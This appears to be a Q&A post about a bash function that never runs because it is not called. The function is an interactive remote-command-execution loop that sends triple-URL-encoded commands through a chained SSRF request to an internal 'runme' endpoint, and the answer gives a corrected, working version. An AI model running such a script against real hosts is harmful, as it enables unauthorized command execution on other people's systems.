# Bash function in script vs. at interactive shell

Tags: bash, function, shell

What's the difference between running this in a bash script and running it directly on the terminal?

```
#!/bin/bash

function rce(){
    while true; do
        read -p "Enter Target IP: TARGET_IP
        echo -n "# "; read -p cmd
        ECMD=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
        curl -s -o - "http://$TARGET_IP/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x={$ECMD}"
        echo ""
    done
}
```

I added the -p to use enter different IP's

[image: output]

this returns nothing in the terminal but doing this get me the expected output.

[image]

Answer (score 1):

It didn't do anything in either case. In both the script and when you pasted it into your interactive shell, you defined the function `rce` but never called it, so ultimately nothing happened. Notice how in the second screenshot you never actually got prompted to "Enter Target IP".

Calling a function has the same syntax as running a regular command. Add the line `rce` to the end of your script:

```
#!/bin/bash

function rce() {
    while true; do
        read -p "Enter Target IP:" TARGET_IP
        echo -n "# "; read -p cmd
        ECMD=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
        curl -s -o - "http://$TARGET_IP/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x={$ECMD}"
        echo ""
    done
}

rce
```

Comment: Got it! thanks, in fact I missed the full output of the rce function, but you solved my questions.